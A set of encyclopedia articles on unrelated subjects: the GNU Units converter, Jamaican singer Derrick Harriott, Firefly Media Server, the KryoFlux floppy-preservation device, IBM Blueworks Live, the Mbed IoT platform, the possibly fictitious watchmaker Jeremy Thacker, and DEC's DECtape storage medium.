173360
https://en.wikipedia.org/wiki/GNU%20Units
GNU Units
GNU Units is a cross-platform computer program for conversion of units of quantities. It has a database of measurement units, including esoteric and historical units. This allows, for instance, conversion of velocities specified in furlongs per fortnight, and pressures specified in tons per acre. Output units are checked for consistency with the input, allowing verification of conversion of complex expressions.

History

GNU Units was written by Adrian Mariano as an implementation of the units utility included with the Unix operating system. It was originally available under a permissive license. The GNU variant is distributed under the GPL, although the FreeBSD project maintains a free fork of units from before the license change.

units (Unix utility)

The original units program has been a standard part of Unix since the early Bell Laboratories versions. Source code for a version very similar to the original is available from the Heirloom Project.

The GNU implementation

GNU units includes several extensions to the original version, including:
Exponents can be written with ^ or **.
Exponents can be larger than 9 if written with ^ or **.
Rational and decimal exponents are supported.
Sums of units can be converted.
Conversions can be made to sums of units, termed unit lists (e.g., from degrees to degrees, minutes, and seconds).
Units that measure reciprocal dimensions can be converted (e.g., S to megohm).
Parentheses for grouping are supported. This sometimes allows more natural expressions, such as in the example given in Complex units expressions.
Roots of units can be computed.
Nonlinear units conversions (e.g., °F to °C) are supported.
Functions such as sin, cos, ln, log, and log2 are included.
A script for updating the currency conversions is included; the script requires Python.
Units definitions, including nonlinear conversions and unit lists, are user extensible.
The plain text database definitions.units is a good reference in itself, as it is extensively commented and cites numerous sources.

Other implementations

UDUNITS is a similar utility program, except that it has an additional programming library interface and date conversion abilities. UDUNITS is considered the de facto program and library for variable unit conversion for netCDF files.

Version history

GNU Units version 2.19 was released on 31 May 2019 to reflect the 2019 revision of the SI. Version 2.14, released on 8 March 2017, fixed several minor bugs and improved support for building on Windows. Version 2.10, released on 26 March 2014, added support for rational exponents greater than one, and added the ability to save an interactive session in a file to provide a record of the conversions performed. Beginning with version 2.10, a 32-bit Windows binary distribution has been available on the project Web page (a 32-bit Windows port of version 1.87 has been available since 2008 as part of the GnuWin32 project). Version 2.02, released on 11 July 2013, added hexadecimal floating-point output and two other options to simplify changing the output format. Version 2.0, released on 2 July 2012, added the ability to convert to sums of units, such as hours and minutes or feet and inches. In addition, this release added support for UTF-8 encoding, and provision for locale-specific unit definitions was added. The syntax for defining non-linear units was changed, with optional domain and range specifications added.
The names of the standard and personal units data files were changed, and the currency definitions were placed in a separate data file; a Python script for updating the currency definitions was added. The version history is covered in detail in the NEWS file included with the source distribution.

Usage

Units will output the result of the conversion in two lines. Usually, the first line (multiplication) is the desired result; the second line is the same conversion expressed as a division. Units can also function as a general-purpose scientific calculator; it includes several built-in mathematical functions such as sin, cos, atan, ln, exp, etc. Attempting to convert types of measurements that are incompatible will cause units to print a conformability error message and display a reduced form of each measurement.

Examples

The examples that follow show results from GNU units version 2.10.

Interactive mode

Currency exchange rates from www.timegenie.com on 2014-03-28
2729 units, 92 prefixes, 77 nonlinear units

You have: 10 furlongs
You want: miles
        * 1.25
        / 0.8
You have: 1 gallon + 3 pints
You want: quarts
        * 5.5
        / 0.18181818
You have: sqrt(meter)
                     ^
Unit not a root
You have: sqrt(acre)
You want: ft
        * 208.71033
        / 0.0047913298
You have: 21 btu + 6500 ft lbf
You want: btu
        * 29.352939
        / 0.034068139
You have: _
You want: J
        * 30968.99
        / 3.2290366e-005
You have: 3.277 hr
You want: time
        3 hr + 16 min + 37.2 sec
You have: 1|2 inch
You want: cm
        * 1.27
        / 0.78740157

The underscore ('_') is used to indicate the result of the last successful unit conversion.

On the command line (non-interactive)

C:\>units "ten furlongs per fortnight" "kilometers per hour"
        * 0.0059871429
        / 167.02458

% units cup ounces
conformability error
        0.00023658824 m^3
        0.028349523 kg

Complex units expressions

One form of the Darcy–Weisbach equation for fluid flow is
        ΔP = (8/π²) f ρ L Q² / d⁵
where ΔP is the pressure drop, ρ is the mass density, f is the (dimensionless) friction factor, L is the length of the pipe, Q is the volumetric flow rate, and d is the pipe diameter. It might be desirable to have the equation in the form
        ΔP = A1 f ρ L Q² / d⁵
that would accept typical US units (ΔP in psi, ρ in lbm/ft³, L in ft, Q in ft³/s, and d in inches); the constant A1 could be determined manually using the unit-factor method, but it could be determined more quickly and easily using units:

$ units "(8/pi^2)(lbm/ft^3)ft(ft^3/s)^2(1/in^5)" psi
        * 43.533969
        / 0.022970568

Crane Technical Paper No. 410, Eq. 3-5, gives the multiplicative value as 43.5.

Notes

References

External links
Linux man page for units
Java version of GNU units
GnuWin port of GNU units
units source from the Heirloom Project
Online units converter based on GNU units
A simple online converter based on GNU units

Cross-platform software Unix software Units Free mathematics software
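The constant in the Complex units expressions example above can be checked by hand with the unit-factor method the article mentions. The following is a minimal illustrative sketch in Python (not part of GNU Units); it uses standard conversion-factor definitions, and the variable names are ours.

```python
# Sketch: reproduce the article's Darcy-Weisbach constant by the manual
# unit-factor method, for comparison with the `units` output shown above.
import math

LBM_TO_KG = 0.45359237                           # 1 lbm in kg
FT_TO_M = 0.3048                                 # 1 ft in m
IN_TO_M = 0.0254                                 # 1 in in m
PSI_TO_PA = LBM_TO_KG * 9.80665 / IN_TO_M**2     # 1 psi (lbf/in^2) in Pa

# (8/pi^2) * (lbm/ft^3) * ft * (ft^3/s)^2 / in^5, evaluated in pascals
value_pa = (8 / math.pi**2) * (LBM_TO_KG / FT_TO_M**3) * FT_TO_M \
           * (FT_TO_M**3)**2 / IN_TO_M**5

print(value_pa / PSI_TO_PA)   # approximately 43.53, matching `units` and Crane TP 410
```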
4051893
https://en.wikipedia.org/wiki/Derrick%20Harriott
Derrick Harriott
Derrick Clifton Harriott OD (born 6 February 1939) is a Jamaican singer and record producer. He was a member of the Jiving Juniors with Herman Sang before embarking on a solo career. He has produced recordings by Big Youth, Chariot Riders, The Chosen Few, Dennis Brown, The Ethiopians, Keith & Tex, The Kingstonians, Rudy Mills, Scotty, Sly & Revolutionaries, and Winston McAnuff.

Biography

The Jiving Juniors
As a student at Excelsior High School, Harriott formed a duo with Claude Sang Jr. Harriott entered the Vere Johns Opportunity Hour talent contest as a solo artist in 1955, failing to reach the final round, and entered again in 1957 as a duo with Sang, going on to win several times. The duo first recorded for Stanley Motta, and went on to record for several producers, having hits including "Daffodil" and "Birds of Britain" before splitting up when Sang's job took him overseas. In 1958 Harriott formed the Jiving Juniors with Eugene Dwyer, Herman Sang (Claude's younger brother), and Maurice Wynter. The group had success on the Vere Johns Opportunity Hour, and in 1960 and 1961 had hit singles with "Lollipop Girl" (for Duke Reid) and "Over The River" (aka "I'll Be Here When He Comes", for Coxsone Dodd). The group split up after Harriott emigrated to the United States, although the other members continued for a while with Jimmy Mudahy replacing Harriott. After struggling to find work, Harriott reformed the Jiving Juniors with a new line-up, having already teamed up again with Claude Sang in New York. The new line-up included Winston Service and Valmont Burke, and split their time between Jamaica and New York, where they recorded at the Mirasound Studios, having hits including "Sugar Dandy". The travelling took its toll and the group split up in 1962.

Solo and production career
Harriott embarked on a solo career and later formed his own record label, Crystal. His first solo release, "I Care", was a hit, with further hits following with "What Can I Do" (1964), "The Jerk" (1965) and "I'm Only Human" (1965), all of which were included on his debut album, The Best of Derrick Harriott. In 1967 he had further solo hits with "The Loser" and "Solomon", as well as with productions of other artists, including The Ethiopians' "No Baptism", and Keith & Tex's "Tonight" and "Stop That Train". The lyrics to his song "Message from a Black Man" (circa 1970) echoed the growing black consciousness in American soul music of that time. In 1970 he issued The Crystalites' The Undertaker, an instrumental album in a similar vein to the early music of The Upsetters. He produced successful albums by other artists, including DJ Scotty's Schooldays, Dennis Brown's Super Reggae and Soul Hits, and also his own 14 Chartbuster Hits. In 1971, Swing magazine named Harriott the Top Producer of 1970. He was one of the first producers to use King Tubby's mixing talents at his Waterhouse studio, issuing one of the earliest dub albums in 1974: Scrub A Dub, credited to The Crystalites. Harriott followed this with another dub/instrumental album, More Scrubbing The Dub. His late 1970s productions used backing from The Revolutionaries on albums such as Winston McAnuff's Pick Hits To Click (1978), DJ Ray I's Rasta Revival (1978) and his own Enter The Chariot and Disco 6 (a compilation album featuring Dennis Brown, Cornell Campbell and Horace Andy). In the 1970s he opened his first record shop on King Street in Kingston, later moving to larger premises at Twin Gates Plaza in Half-Way Tree.
In the 1980s, he continued to have hits with soul cover versions, such as "Skin To Skin" and "Checking Out". In 1988 he scored with "Starting All Over Again", a duet with Yellowman, with lyrics about Hurricane Gilbert. The mid-to-late 1990s saw the release of solo efforts such as Sings Jamaican Rock Steady Reggae, For a Fistful of Dollars, Derrick Harriott & Giants, and Riding the Roots Chariot. In July 2002 in Toronto, Ontario, Canada, Harriott performed at the two-night Legends of Ska festival. Other performers included Skatalites, Rico Rodriguez, Lester Sterling, Johnny Moore, Lynn Taitt, Prince Buster, Alton Ellis, Lord Creator, Justin Hinds, Derrick Morgan and Lord Tanamo. In 2009, Harriott was awarded the Order of Distinction by the Jamaican government, and in 2019 he received a Lifetime Achievement Award in Music from the Jamaica Reggae Industry Association (JaRIA).

Discography

Albums
The Best of Derrick Harriott – 1965 – Island
The Best of Derrick Harriott Volume 2 – 1968 – Trojan
Sings Jamaican Reggae – 1969 – Crystal/Pama
The Crystalites – Undertaker – 1970 – Trojan
Psychedelic Train – 1970 – Crystal/Trojan
Presents Scrub-A-Dub Reggae – 1974 – Crystal
More Scrubbing The Dub – 1975 – Crystal
Songs For Midnight Lovers – 1976 – Crystal/Trojan
Derrick Harriott & The Revolutionaries – Reggae Chart Busters Seventies Style – 1977
Reggae Disco Rockers – 1977 – Charmers
Born to Love You – 1979 – Crystal

Compilation albums
Derrick Harriott & Various Artists – 14 Chartbuster Hits – 1973 – Crystal
Derrick Harriott & The Crystalites / Chariot Riders – 1970 – Blockbuster Reggae Instrumentals
Greatest Reggae Hits – 1975 – Crystal/Trojan
Disco 6 – 1977
Enter The Chariot – 1978
Derrick Harriott & Various Artists – Those Reggae Oldies – 1978
Derrick Harriott & The Jiving Juniors – The Donkey Years 1961–1965 – Jamaican Gold (1993)
Derrick Harriott & Various Artists – Step Softly 1965–1972 – Trojan (1988)
Derrick Harriott – Sings Jamaican Rock Steady Reggae – Jamaican Gold
Derrick Harriott & The Crystalites – For A Fistful of Dollars – Jamaican Gold
From Chariot's Vault Volume 2: 16 Reggae Hits – Jamaican Gold
Derrick Harriott & Various Artists – Riding the Roots Chariot – 1998 – Pressure Sounds
Derrick Harriott & Various Artists – Skin To Skin – 1989 – Sarge
Derrick Harriott & Various Artists – Musical Chariot – 1990 – Charly Records

See also
List of reggae musicians
Island Records discography
List of Jamaican record producers
List of Jamaican backing bands

References

External links
Pressure Sounds biography of Harriott
Derrick Harriott & The Jiving Juniors I
Derrick Harriott & The Jiving Juniors II

1939 births Jamaican reggae musicians Jamaican male singers Jamaican record producers Living people
5736617
https://en.wikipedia.org/wiki/Firefly%20Media%20Server
Firefly Media Server
Firefly Media Server (formerly mt-daapd) is an open-source audio media server (or daemon) for the Roku SoundBridge and iTunes. It serves media files using Roku Server Protocol (RSP) and Digital Audio Access Protocol (DAAP).

Features

Its features include:
Support for running on Unix/POSIX platforms
Support for running on Microsoft Windows and Mac OS X
Support for running on the Apple Inc. iPhone and iPod touch
Support for MP3, AAC, Ogg, FLAC, and WMA
Support for Roku SoundBridge via RSP
Support for on-the-fly transcoding of Ogg, FLAC, ALAC, and WMA
On Windows platforms, on-the-fly transcoding of WMA Lossless, WMA Pro and WMA Voice
Web-based configuration
Support for user-created smart playlists
Integration with the iTunes library, including reading playlists
Support for serving streaming radio stations

Firefly Media Server was formerly known as mt-daapd. It was renamed when it adopted new features such as support for RSP and support for Microsoft Windows and Mac OS X.

Latest developments

Firefly Media Server is not under active development, although there have been a few attempts to resurrect it. There was an abortive effort to continue the project as Firefly2 Media Server, but no developers came forward; the old forums and links to many forked versions are available at the new website. Since July 2009, development has continued on a Linux/FreeBSD fork named forked-daapd, which was later renamed OwnTone Server.

Client players
DAAP (Android audio player)
Rhythmbox, Banshee, and Amarok (Linux media players)

See also
SlimServer

External links
Firefly Media Server website
Twitter

Free software programmed in C Streaming software Windows multimedia software MacOS multimedia software Unix Internet software Audio streaming software for Linux
41340805
https://en.wikipedia.org/wiki/KryoFlux
KryoFlux
KryoFlux is a hardware and software solution for preserving software on floppy disks. It was developed by the Software Preservation Society. KryoFlux consists of a small hardware device, a software-programmable floppy disk controller (FDC) built around a small ARM-based board, which connects a floppy disk drive to a host PC over USB, together with software for accessing the device. KryoFlux reads "flux transitions" from floppy disks at a very fine resolution. It can also read disks originally written with different bit cell widths and drive speeds, with a normal fixed-speed drive. The software is available for Microsoft Windows, Mac OS and Linux. The KryoFlux controller plugs into a standard USB port, and allows normal PC floppy disk drives to be plugged into it. Because the device operates on data bits at the lowest possible level with very precise timing resolution, it allows modern PCs to read, decode and write floppy disks that use practically any data format or method of copy protection, aiding digital preservation. It has been tested successfully with many generations of floppy disk drive, including 8", 5.25", 3.5" and 3" mechanisms, and dozens of disk formats, including numerous schemes originally designed to prevent software piracy, allowing the preservation (typically to an image file stored on hard disk or other modern media) of programs and data that will inevitably succumb to data degradation as the original physical media deteriorates and becomes unreadable over time. The image files produced may be rewritten to fresh disk media or, more commonly, used with software emulations of the original systems. When reading old disks (especially those stored in non-climate controlled environments for long periods) there are a number of problems that can arise, including weakening of the magnetic field storing the data, deterioration of the binder holding the metal particles to the plastic disk surface, friction issues preventing the disk from rotating freely in its outer protective sleeve, and issues caused by physical misalignment of the drive that originally wrote the disk or the one being used to read it. Users have detailed various techniques to aid in the recovery of data stored on such marginal disks. References Archival science Digital preservation Floppy disk computer storage
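As an illustration of what working with flux transitions involves, the sketch below bins a sequence of measured transition intervals into nominal bit-cell classes. It is a simplified, hypothetical example: the 4/6/8 microsecond intervals assumed here correspond to a double-density 250 kbit/s MFM disk, and this is not KryoFlux's actual decoder, which does much more (for example, clock recovery that tracks drive-speed variation).

```python
# Illustrative sketch only: classify flux-transition intervals (in microseconds)
# into the nominal 4/6/8 us classes typical of double-density MFM floppies.
NOMINAL_US = (4.0, 6.0, 8.0)  # assumed nominal intervals at 250 kbit/s

def classify(intervals_us):
    """Map each measured interval to the closest nominal interval."""
    return [min(NOMINAL_US, key=lambda n: abs(n - t)) for t in intervals_us]

# Slightly off-nominal measurements, as a worn disk or off-speed drive might produce
print(classify([4.2, 3.9, 6.1, 8.3, 5.8]))   # [4.0, 4.0, 6.0, 8.0, 6.0]
```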
33736801
https://en.wikipedia.org/wiki/IBM%20Blueworks%20Live
IBM Blueworks Live
IBM Blueworks Live is a business process modeller that belongs to the IBM SmartCloud set of applications. The application is designed to help organizations discover and document their business processes, business decisions and policies in a collaborative manner. It is designed to be simple and intuitive to use, while still having the capability to implement more complex models. Blueworks Live adheres to the BPMN 2.0 standard developed and maintained by BPMN.org.

Purpose

Blueworks Live is intended to be a business-user-focused process & decision discovery and documentation tool. A number of more complicated BPMN 2.0 specification attributes are left out with the aim of creating simple, understandable processes & decisions in Blueworks Live. All data is stored in the cloud, eliminating the need for infrastructure beyond a computer with a web browser. Blueworks Live is also fully integrated with IBM's BPM product, enabling customers to quickly take their processes from discovery to implementation if so desired.

History

The original concept for a business process modeller with a SaaS deployment model came with Blueprint, an application developed by Lombardi Inc. The company, with its range of BPM products, caught IBM's attention, and in January 2010 IBM acquired Lombardi. IBM already had a product in the same space known as IBM Blueworks, but that was superseded by the new technology of Lombardi's Blueprint and became Blueworks Live. IBM launched Blueworks Live on 20 November 2010.

Features

Discovery and documentation

Capturing processes & decisions
Blueworks Live provides various tools for companies to capture business processes & decisions, using a collaborative approach to discovering those processes with maximum accuracy. There are three different views for process data: the Discovery Map, Process Diagram, and Documentation. The Discovery Map is intended to enable business users to quickly and efficiently get the process activities and milestones out on 'paper'. This view is about capturing the information as quickly as possible without worrying about the process logic. Once the process has been sufficiently identified in the Discovery Map, the details popup is used to provide the Participant data, and Blueworks Live can then generate the Process Diagram, where the details of the process logic and flows are added. Each Participant identified in the Discovery Map has a swimlane, and the activities assigned to that Participant appear in it. The Documentation view is intended to read like a Microsoft Word document containing all of the process documentation added in the details popup. Decisions have only one view, the Decision Diagram. This is a graphical representation of the decision, the flows, and the sub-decisions involved. Each decision and sub-decision has inputs and outputs that can be defined to populate the decision table. Blueworks Live is compliant with the DMN 1.0 specification.
Data import and export

Blueworks Live allows users to import diagrams from:
Microsoft Visio using the vdx XML format
BPMN 2.0 XML
XPDL 2.1 XML

In terms of export, users can automatically generate outputs in the following formats:
Microsoft PowerPoint
Microsoft Word
Microsoft Excel Process Data (Export Process option)
BPMN 2.0 (Export Process option) (Note: this output format does not contain the diagrams or diagram elements)
XPDL 2.1 (Export Process option)
IBM WebSphere Business Modeler XML 7.0 (Export Process option)

Centralized collaboration

Blueworks Live uses many social networking features, enabling team collaboration:
Instant messaging
Live news feeds
Commenting (process changes)
Newsfeed – current work statistics and reports on the site's main page

Public and private communities

Blueworks Live uses its main page to inform users about changes occurring to company processes in which the user is involved (private), and about useful information and news from the wider BPM community (public). This involves blogs, tutorials, or application changes and updates.

Licensing

Blueworks Live distinguishes between four types of license: Editors, Contributors, Viewers, and Community.

Editors are able to:
Create and modify processes & decisions
Publish processes & decisions
Automate processes
Manage spaces
Utilize the Analyze and Playback features

Contributors are able to:
Add comments to processes & decisions
Participate in process automation

Viewers are able to:
View published processes and decisions
Viewers can follow the link to open a published process in Blueworks Live, and can review process & decision details: the Discovery Map, Process Diagram and Process Documentation. The viewer capabilities are intended to enable wider adoption across an enterprise. In cases where a customer uses SSO for login and has viewer licenses, the account administrator can enable JIT provisioning.

Community users can:
View the Community tab
Perform the role of account Admin

Automating simple processes

Blueworks Live also provides its users with a process automation feature. There are two different types of process allowed in Blueworks Live: workflow and checklist. The workflow process application allows the creation of either parallel or sequential activities. This is useful for review and approval types of processes, and distributes the tasks in a precise manner determined by the design of the workflow. The checklist process application is useful for disseminating information all at once, without regard to the order in which people respond.

Privacy and security

Data privacy and security
All the information and data stored in Blueworks Live is private, and is inaccessible by IBM unless a customer specifically gives written permission for access.

Network security
Servers are protected by a firewall configured to block all traffic on ports other than 80 or 443 (HTTP, HTTPS). Blueworks Live also uses 256-bit Secure Sockets Layer (SSL 3.0 / TLS 1.2) for server authentication and data encryption. User authentication is ensured by providing every user a unique password tied to their personal or company e-mail address.

Authentication
IBM lets users choose their preferred level of authentication in the application settings. There are two security levels: Medium and High.
Medium: the existing password is required when changing it to a new one, and a user is locked out after several consecutive failed login attempts.
High: a password policy maximizes password strength and requires users to change their password every 90 days.
Compatibility Since Blueworks Live is a web application, it can be accessed from any workstation with Internet connectivity and a web browser, regardless of the operating system. Some of the basic features are also accessible through a mobile phone. Browsers currently supported include Internet Explorer, Firefox, Safari and Google Chrome. Sources List of Blueworks Live features, Official Blueworks Live site - https://www.ibm.com/products/blueworkslive IBM launches Blueworks Live, business process fixes as a service, Larry Dignan, October 11, 2010, ZDNET.com - http://www.zdnet.com/blog/btl/ibm-launches-blueworks-live-business-process-fixes-as-a-service/40286 Blueworks Live article, BPM geek Initiative website - http://bpmgeek.com/blueworks-live Automate manual processes with IBM Blueworks Live, Belinda Chang, Staff Software Engineer, IBM developer works - http://www.ibm.com/developerworks/websphere/bpmjournal/1106_chang/1106_chang.html?ca=drs- IBM Blueworks Live sneak-peak [sic], Column 2 BPM blog - http://www.column2.com/2010/11/ibm-blueworks-live-sneak-peak/ Blueworks Live Update, April 4, 2011 by Scott Francis, BP3 BPM blog - http://www.bp-3.com/blogs/2011/04/blueworks-live-update-april-2011/ IBM Announces Blueworks Live, 'Lite' SaaS Based BPM, by David Roe, CMS Wire - http://www.cmswire.com/cms/enterprise-cms/ibm-announces-blueworks-live-lite-saas-based-bpm-008844.php Blueworks Live: A Curate’s Egg, Mike Gammage, November 11, 2010, posted in "Cloud", Business Computing World - http://www.businesscomputingworld.co.uk/blueworks-live-a-curates-egg/ References External links Official website Free trial Workflow applications Blueworks Live Cloud infrastructure
34578512
https://en.wikipedia.org/wiki/Mbed
Mbed
Mbed is a platform and operating system for internet-connected devices based on 32-bit ARM Cortex-M microcontrollers. Such devices are also known as Internet of Things devices. The project is collaboratively developed by Arm and its technology partners.

Software development

Applications
Applications for the Mbed platform can be developed using the Mbed online IDE, a free online code editor and compiler. Only a web browser needs to be installed on the local PC, since a project is compiled in the cloud, i.e. on a remote server, using the ARMCC C/C++ compiler. The Mbed IDE provides private workspaces with the ability to import, export, and share code with distributed Mercurial version control, and it can also be used to generate code documentation. Applications can also be developed with other development environments such as Keil µVision, IAR Embedded Workbench, and Eclipse with GCC ARM Embedded tools.

Mbed OS
Mbed OS provides the Mbed C/C++ software platform and tools for creating microcontroller firmware that runs on IoT devices. It consists of the core libraries that provide the microcontroller peripheral drivers, networking, RTOS and runtime environment, build tools, and test and debug scripts. Network connections can be secured by compatible SSL/TLS libraries such as Mbed TLS or wolfSSL, which supports mbed-rtos. A components database provides driver libraries for components and services that can be connected to the microcontrollers to build a final product. Mbed OS, the RTOS, is based on Keil RTX5.

Hardware development

Demo-boards
There are various hardware demo-boards for the Mbed platform, with the first being the original Mbed Microcontroller board. The Mbed Microcontroller Board (marketed as the "mbed NXP LPC1768") is a demo-board based on an NXP microcontroller, which has an ARM Cortex-M3 core running at 96 MHz, with 512 KB flash and 32 KB RAM, as well as several interfaces including Ethernet, USB Device, CAN, SPI, I2C and other I/O. The Mbed microcontroller received first prize in the annual EDN Innovation Awards' Software/Embedded Tools category in 2010. Various versions of the board were released, with NXP LPC2368 (ARM7TDMI-S), NXP LPC1768 (Cortex-M3), and NXP LPC11U24 (Cortex-M0) microcontrollers.

HDK
The Mbed hardware development kit (HDK) is designed for OEMs, and provides information to build custom hardware to support Mbed OS. It consists of interface firmware and schematics that can be used to easily create development boards, OEM modules and re-programmable products suitable for production.

Project development

The project is developed by Arm in conjunction with other major technology companies and the Mbed developer community. Development and contributions happen at different levels:
Core Platform – The core software platform, developed by core contributors and partner companies and managed and maintained by the Mbed team. This core platform is developed under the Apache License 2.0 via a contributor agreement. It includes all the core generic software components the platform provides, plus the HAL ports that allow Mbed to run transparently on different manufacturers' microcontrollers and the toolchain ports that allow development using different embedded toolchains.
Component Database – Library components, developed by companies and the wider community, to provide support for peripheral components, sensors, radios, protocols and cloud service APIs needed to build end devices.
These are contributed under the Apache License 2.0 (encouraged) or other licenses chosen by the creators, and are supported by those individual companies and members of the developer community.

References

External links

ARM operating systems Microcontroller software
25499624
https://en.wikipedia.org/wiki/Jeremy%20Thacker
Jeremy Thacker
Jeremy Thacker was an 18th-century writer and watchmaker (although see the important qualification under 'Hoax?' below), who for a long time was believed to be the first to have coined the word "chronometer" for precise clocks designed to find longitude at sea, though an earlier reference by William Derham has now been found. Thacker is credited with writing The Longitudes Examin'd, published in London in 1714, in which the term 'chronometer' appears. In the work, the claim is made that Thacker created and extensively tested a marine chronometer positioned on gimbals and within a vacuum, and that sea trials would take place. It has been concluded by others that such tests must have resulted in failure. The idea of a vacuum for a marine clock had already been proposed by the Italian clockmaker Antimo Tempera in 1668. Slightly later, John Harrison would successfully build marine timekeepers from 1730. Hoax? According to an article published in the Times Literary Supplement in November 2008, Pat Rogers argued that "Thacker may never have existed and his proposal now emerges possibly as a hoax?". Rogers argues Thacker was an invention of John Arbuthnot, and that The Longitudes Examined fell within the major tradition for satire, and that it was designed to send-up ambitious longitude projects. This view met with opposition from Jonathan Betts and Andrew King, both noted Harrisonians, who argued that, as Rogers acknowledged, there were in fact "convincing reasons for accepting the traditional view that some good science is dropped into the project". Further reading Gregory Lynall, 'Scriblerian Projections of Longitude: Arbuthnot, Swift, and the Agency of Satire in a Culture of Invention', Journal of Literature and Science, vol. 7, no. 2 (2014), ISSN 1754-646X, pp. 1–18. Notes English clockmakers 18th-century English writers 18th-century English male writers 18th-century British people
893415
https://en.wikipedia.org/wiki/DECtape
DECtape
DECtape, originally called Microtape, is a magnetic tape data storage medium used with many Digital Equipment Corporation computers, including the PDP-6, PDP-8, LINC-8, PDP-9, PDP-10, PDP-11, PDP-12, and the PDP-15. On DEC's 32-bit systems, VAX/VMS support for it was implemented but did not become an official part of the product lineup. DECtapes are 3/4 inch (19 mm) wide, and formatted into blocks of data that can each be read or written individually. Each tape stores 184K 12-bit PDP-8 words or 144K 18-bit words. Block size is 128 12-bit words (for the 12-bit machines), or 256 18-bit words for the other machines (16, 18, 32, or 36 bit systems). From a programming point of view, because the system is block-oriented and allows random seeking, DECtape behaves like a very slow disk drive. Origins DECtape has its origin in the LINCtape tape system, which was originally designed by Wesley Clark at the MIT Lincoln Laboratory as an integral part of the LINC computer. There are simple LINC instructions for reading and writing tape blocks using a single machine instruction. The design of the LINC, including LINCtape, was placed in the public domain because its development had been funded by the government. LINCtape drives were manufactured by several companies, including Digital. In turn, LINCtape's origin can be found in the magnetic tape system for the historic Lincoln Laboratory TX-2 computer, designed by Richard L. Best and T. C. Stockebrand. The TX-2 Tape System is the direct ancestor of LINCtape, including the use of two redundant sets of five tracks and a direct drive tape transport, but it uses a physically incompatible tape format (½-inch tape on 10-inch reels, where LINC tape and DECtape used ¾-inch tape on 4-inch reels). Digital initially introduced the Type 550 Microtape Control and Type 555 Dual Microtape Transport as peripherals for the PDP-1 and PDP-4 computers, both 18-bit machines. DEC advertised the availability of these peripherals in March and May, 1963, and by November, planning was already underway to offer the product for the 12-bit PDP-5 and 36-bit PDP-6, even though this involved a change in recording format. The initial specifications for the Type 550 controller discuss a significant advance beyond the LINCtape, the ability to read and write in either direction. By late 1964, the Type 555 transport was being marketed as a DECtape transport. The tape transport used on the LINC is essentially the same as the Type 555 transport, with the same interface signals and the same physical tape medium. The LINC and DEC controllers, however, are incompatible, and the positions of the supply and take-up reels were reversed between the LINC and DEC tape formats. While LINCtape supports high-speed bidirectional block search, it only supports actual data read and write operations in the forward direction. DECtape uses a significantly different mark track format to provide for the possibility of read and write operations in either direction, although not all DECtape controllers support reverse read. DEC applied for a patent on the enhanced features incorporated into DECtape in late 1964. It is notable that the inventor listed on this patent, Thomas Stockebrand, is also an author of the paper on the TX-2 tape system from which the LINC tape was derived. Eventually, the TC12-F tape controller on the PDP-12 supported both LINCtape and DECtape on the same transport. 
As with the earlier LINC-8, the PDP-12 is a PDP-8 augmented with hardware support for the LINC instruction set and associated laboratory peripherals.

Technical details

DECtape was designed to be reliable and durable enough to be used as the main storage medium for a computer's operating system (OS). It is possible, although slow, to use a DECtape drive to run a small OS such as OS/8 or OS/12. The system would be configured to put temporary swap files on a second DECtape drive, so as not to slow down access to the main drive holding the system programs. Upon its introduction, DECtape was considered a major improvement over hand-loaded paper tapes, which could not be used to support swap files essential for practical timesharing. Early hard disk and drum drives were very expensive, limited in capacity, and notoriously unreliable, so the DECtape was a breakthrough in supporting the first timesharing systems on DEC computers. The legendary PDP-1 at MIT, where early computer hacker culture developed, adopted multiple DECtape drives to support a primitive software sharing community. The hard disk system (when it was working) was considered a "temporary" file storage device used for speed, not to be trusted to hold files for long-term storage. Computer users would keep their own personal work files on DECtapes, as well as software to be shared with others. The design of DECtape and its controllers was quite different from any other type of tape drive or controller at the time. The tape is 3/4 inch (19 mm) wide, accommodating 6 data tracks, 2 mark tracks, and 2 clock tracks, with data recorded at roughly 350 bits per inch (138 bits per cm). Each track is paired with a non-adjacent track for redundancy by wiring the tape heads in parallel; as a result the electronics only deal with 5 tracks: a clock track, a mark track and 3 data tracks. Manchester encoding (PE) is used. The clock and mark tracks are written only once, when the tape is formatted; after that, they are read-only. This means a "drop-out" on one channel can be tolerated; even a hole punched through the tape with a hole punch will not cause the read to fail. Another reason for DECtape's unusually high reliability is the use of laminated tape: the magnetic oxide is sandwiched between two layers of mylar, rather than being on the surface as was common in other magnetic tape types. This allows the tape to survive many thousands of passes over the tape heads without wearing away the oxide layer, which would otherwise have occurred in heavy swap file use on timesharing systems. The fundamental durability and reliability of DECtape was underscored when the design of the tape reel mounting hubs was changed in the early 1970s. The original machined metal hub with a retaining spring was replaced by a lower cost single-piece plastic hub with 6 flexible arms in a "starfish" or "flower" shape. When a defective batch of these new design hubs was shipped on new DECtape drives, these hubs would loosen over time. As a result, DECtape reels would fall off the drives, usually when being spun at full speed, as in an end-to-end seek. The reel of tape would fall onto the floor and roll in a straight line or circle, often unspooling and tangling the tape as it went. In spite of this horrifying spectacle, desperate users would carefully untangle that tape and wind it laboriously back onto the tape reel, then re-install it onto the hub, with a paper shim to hold the reel more tightly.
The data on the mangled DECtape could often be recovered completely and copied to another tape, provided that the original tape had only been creased multiple times, and not stretched or broken. DEC quickly issued an Engineering Change Order (ECO) to replace the defective hubs and resolve the problem. Eventually, a heavily used or abused DECtape begins to become unreliable. The operating system is usually programmed to keep retrying a failed read operation, which often succeeds after multiple attempts. Experienced DECtape users learned to notice the characteristic "shoe-shining" motion of a failing DECtape as it was passed repeatedly back and forth over the tape heads, and would retire the tape from further use.

On non-DEC computers

Computer Operations Inc (COI) of Beltsville, Maryland, offered a DECtape clone in the 1970s. Initially, COI offered LINC-tape drives for computers made by Data General, Hewlett-Packard and Varian, with only passing reference to its similarity to DECtape. While DECtape and LINC tape are physically interchangeable, the data format COI initially used for 16-bit minicomputers was distinct from both the format used by the LINC and the format used on DECtape. When COI offered the LINC Tape II with support for the DEC PDP-8, PDP-11, Data General Nova, Interdata 7/32, HP 2100, Honeywell 316 and several other computers in 1974, the drive was priced at $1995 and was explicitly advertised as being DECtape compatible. In 1974, DEC charged COI with patent infringement. COI, in turn, filed a suit claiming that DEC's patent was invalid on several grounds, including the assertions that DEC had marketed DECtape-based equipment for over a year before filing for the patent, that they had failed to properly disclose the prior art, and that the key claims in the DEC patent were in the public domain. The US Patent and Trademark Office ruled DEC's patent invalid in 1978. The court case continued into the 1980s.

DECtape II

